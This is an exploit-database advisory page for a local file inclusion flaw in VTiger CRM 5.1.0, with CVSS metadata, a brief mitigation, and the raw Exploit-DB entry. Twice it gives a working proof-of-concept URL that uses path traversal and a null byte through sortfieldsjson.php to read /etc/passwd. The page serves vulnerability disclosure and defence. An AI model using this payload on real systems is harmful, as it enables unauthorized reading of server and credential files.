header-logo
Suggest Exploit
vendor:
VTiger CRM
by:
Pi3rrot
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: VTiger CRM
Affected Version From: 5.1.0
Affected Version To: 5.1.0
Patch Exists: YES
Related CWE: none
CPE: a:vtiger:vtiger_crm:5.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 6
2012

VTiger CRM

We have find this vulnerabilitie in VTiger 5.1.0. In this example, you can see a Local file Inclusion in the file sortfieldsjson.php. Try this: https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.
Source

Exploit-DB raw data:

# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none

We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php

Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR